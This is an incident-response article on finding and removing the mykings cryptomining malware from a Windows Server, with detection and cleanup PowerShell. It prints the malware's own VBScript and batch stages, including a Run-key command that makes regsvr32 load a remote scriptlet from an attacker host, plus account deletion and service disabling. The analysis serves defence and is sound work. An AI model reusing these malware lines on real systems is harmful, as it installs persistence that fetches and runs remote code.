Information Security

How to Detect and Eradicate Hidden Windows Server Mining Malware

This article walks through the discovery, analysis, and complete removal of a stealthy Windows Server mining malware, detailing suspicious processes, malicious scheduled tasks, registry modifications, WMI persistence, and post‑infection hardening steps to secure the system.

Ops Development Stories

Cause

A Windows Server 2012 instance on Alibaba Cloud repeatedly rebooted with its firewall disabled; the cloud support team could not identify the cause and suggested a malware infection. Cloud monitoring showed a high-CPU process named lsma12.exe.

Investigation

The mining executable was located at C:/windows/inf/aspnet/lsma12.exe. Deleting it removed the process temporarily, but it reappeared after a reboot. Five scheduled tasks were found, suggesting persistence via MBR and registry modifications.

The tasks included:

my1: runs c:/windows/system/my1.bat daily at 12 PM.

Mysa: executes an FTP command on system startup to download a malicious a.exe and save it as c:\windows\update.exe.

Mysa1, Mysa2, ok, ok1: various commands that launch the mining program.

Downloading the s.rar archive

The archive contained a .bat script and a .vbs script.

The VBS file n.vbs simply creates a Wscript.Shell object to run c3.bat hidden, and then deletes itself.

<code>' n.vbs: launches the batch stage without a visible window, then removes itself
Set ws = CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.Filesystemobject")
On Error Resume Next
' vbHide (0) runs c3.bat with no console window
ws.Run "C:\Windows\inf\c3.bat", vbHide
' self-delete so only the batch stage is left on disk
fso.DeleteFile(WScript.ScriptFullName)
WScript.Quit
</code>

Detailed look at c3.bat

<code>rem Delete accounts left behind by competing malware
net1 user mm123$ /del&net1 user admin$ /del&net1 user sysadm05 /del
rem Stop and disable the AnyDesk remote-access service
net stop AnyDesk&sc config AnyDesk start= disabled
rem Clear system/hidden/read-only attributes on many .exe files so they can be deleted
attrib -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe&...
rem Kill processes belonging to competing miners
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe ...
rem Delete various files and reset permissions
del c:\windows\temp\*.exe&del c:\windows\temp\king.exe&...
rem Add a Run-key entry that makes regsvr32 load a remote scriptlet at logon
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll" /f
rem Delete the scheduled tasks (re-created later by the malware itself)
schtasks /Delete /TN "Mysa" /F
schtasks /Delete /TN "Mysa1" /F
schtasks /Delete /TN "Mysa2" /F
schtasks /Delete /TN "Mysa3" /F
schtasks /Delete /TN "ok" /F
schtasks /Delete /TN "ok1" /F
rem Remove existing WMI event filter and consumer (the WMI backdoor)
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
</code>
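The three persistence mechanisms visible in c3.bat (the WMI event subscription, the regsvr32 scriptlet Run value, and the scheduled tasks) can be hunted for in one pass. The following PowerShell is an added example and not part of the original article; it assumes an elevated session on the affected host, and the names it matches on (fuckyoumm2, Mysa*, ok*, my1, the "start" value) are the ones reported above.

```powershell
# Added example: enumerate the persistence artifacts described in the article.
# Run elevated. Names and paths matched here come from the article; the regexes are mine.
$findings = @()

# 1. WMI event subscriptions: filter, script consumer, and the binding that ties them together.
$ns = 'root\subscription'
$filters   = Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue
$consumers = Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -ErrorAction SilentlyContinue
$bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue
foreach ($f in $filters)   { $findings += "WMI filter:   $($f.Name) -> $($f.Query)" }
foreach ($c in $consumers) { $findings += "WMI consumer: $($c.Name) ($($c.ScriptingEngine)), script length $($c.ScriptText.Length)" }
foreach ($b in $bindings)  { $findings += "WMI binding:  $($b.Filter) => $($b.Consumer)" }
# Any ActiveScriptEventConsumer on a server deserves a look; fuckyoumm2_* is the name seen in this case.

# 2. Run-key values that make regsvr32 load a remote scriptlet (regsvr32 /i:http://... scrobj.dll).
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
  if (Test-Path $key) {
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
      if ($p.Value -is [string] -and $p.Value -match 'regsvr32.*/i:https?://.*scrobj\.dll') {
        $findings += "Run value '$($p.Name)' in $key loads a remote scriptlet: $($p.Value)"
      }
    }
  }
}

# 3. Scheduled tasks with the reported names, or whose action runs ftp, a script, or something under \windows\system or \inf.
$suspectNames = 'my1','Mysa','Mysa1','Mysa2','Mysa3','ok','ok1'
foreach ($t in Get-ScheduledTask) {
  foreach ($a in $t.Actions) {
    $cmd = "$($a.Execute) $($a.Arguments)"
    if ($suspectNames -contains $t.TaskName -or $cmd -match '\bftp\b|\\windows\\system\\|\\inf\\|\.bat\b|\.vbs\b') {
      $findings += "Task '$($t.TaskName)' ($($t.State)): $cmd"
    }
  }
}

if ($findings) { $findings | ForEach-Object { Write-Output $_ } }
else           { Write-Output 'No matching persistence artifacts found.' }
```

The binding query is the important one: a filter or consumer on its own does nothing, so an orphaned consumer can be a leftover, while a live __FilterToConsumerBinding means the script still fires.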

Abnormal service discovery

A service named xWinWpdSrv was running C:/Windows/system/msinfo.exe -s -syn 1000, interfering with the Network List service and causing network restrictions after reboot. The service was disabled.

Root cause analysis

Public reports suggest that this malware (known as mykings) spreads via brute-force attacks on port 1433 (SQL Server), EternalBlue (MS17-010), and other weak credentials. This server had no SQL Server installed, and a vulnerability scan with the Windows-Exploit-Suggester script found no missing patches with known exploits, so the intrusion vector here was likely something else.

Symptoms after infection

CPU spikes caused by the lsma12.exe process.

Firewall automatically enabled, a security policy named win created, and ports 139/445 blocked.

Malicious scheduled tasks and a WMI persistence backdoor.

Registry modifications and MBR infection.

Post‑infection the host attempts further brute‑force attacks on other servers.

Remediation steps

Add the malicious FTP address ftp://ftp.ftp1202.site to a block list, or block it via the hosts file.

Use Sysinternals Autoruns to remove suspicious startup entries (e.g., the start registry value).

Delete the malicious scheduled tasks: Mysa, Mysa1, Mysa2, Mysa3, ok, ok1.

Remove the WMI event filter and consumer named fuckyoumm2.

Delete the malware batch file C:\Windows\system\my1.bat.

Delete the mining executable C:/windows/inf/aspnet/lsma12.exe.

Repair the MBR using Tencent PC Manager’s System Aid Box.

Run a full system scan with reputable security tools.
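The remediation steps above can be scripted so that nothing is missed between the reboot-triggered re-infections. The following PowerShell is an added example and not the article's own procedure; it assumes an elevated session, uses only the task names, WMI object names, registry value, file paths and hosts listed in this article, and leaves the MBR repair and the full antivirus scan as manual steps.

```powershell
# Added example: scripted cleanup of the artifacts named in the article. Run elevated.
# Artifact names are from the article; the hosts-file sinkhole and error handling are mine.
$ErrorActionPreference = 'Continue'

# 1. Sinkhole the download/scriptlet hosts in the hosts file (skip entries already present).
$hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$current   = Get-Content $hostsPath
foreach ($h in 'ftp.ftp1202.site', 'js.ftp1202.site') {
  if (-not ($current -match "\s$([regex]::Escape($h))\s*$")) {
    Add-Content -Path $hostsPath -Value "127.0.0.1`t$h`t# blocked: mykings miner download host"
  }
}

# 2. Remove the malicious scheduled tasks.
foreach ($name in 'my1','Mysa','Mysa1','Mysa2','Mysa3','ok','ok1') {
  if (Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue) {
    Unregister-ScheduledTask -TaskName $name -Confirm:$false
    Write-Output "Removed scheduled task $name"
  }
}

# 3. Remove the WMI persistence: binding first, then the consumer and filter it referenced.
$ns = 'root\subscription'
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
  Where-Object { $_.Filter -match 'fuckyoumm2' -or $_.Consumer -match 'fuckyoumm2' } |
  Remove-WmiObject
Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='fuckyoumm2_filter'" | Remove-WmiObject
Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -Filter "Name='fuckyoumm2_consumer'" | Remove-WmiObject

# 4. Remove the regsvr32 Run-key value, stop the miner, and delete the dropped files.
Remove-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'start' -ErrorAction SilentlyContinue
$dropped = "$env:SystemRoot\inf\aspnet\lsma12.exe", "$env:SystemRoot\system\my1.bat",
           "$env:SystemRoot\inf\c3.bat", "$env:SystemRoot\update.exe"
foreach ($f in $dropped) {
  if (Test-Path $f) {
    Stop-Process -Name ([IO.Path]::GetFileNameWithoutExtension($f)) -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $f -Force
    Write-Output "Deleted $f"
  }
}

# 5. Stop and disable the rogue service; MBR repair and a full AV scan are done separately.
Stop-Service -Name xWinWpdSrv -Force -ErrorAction SilentlyContinue
Set-Service -Name xWinWpdSrv -StartupType Disabled -ErrorAction SilentlyContinue
```

Re-run the detection pass after the next reboot: if any task or WMI object comes back, a loader (the MBR component or another startup entry) is still present and the host should be rebuilt rather than cleaned further.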

Post‑remediation hardening

Close unnecessary ports, especially 139, 445, and 1433; configure cloud security groups accordingly.

Patch vulnerable services promptly.

Audit system accounts and remove any unknown users.

Enforce strong passwords and disable default accounts such as the SQL Server sa account.

References

https://wukungt.github.io/

http://www.sangfor.com.cn/about/source-news-company-news/1195.html

https://www.freebuf.com/vuls/194515.html

Written by

Ops Development Stories

Maintained by a like‑minded team, covering both operations and development. Topics span Linux ops, DevOps toolchain, Kubernetes containerization, monitoring, log collection, network security, and Python or Go development. Team members: Qiao Ke, wanger, Dong Ge, Su Xin, Hua Zai, Zheng Ge, Teacher Xia.
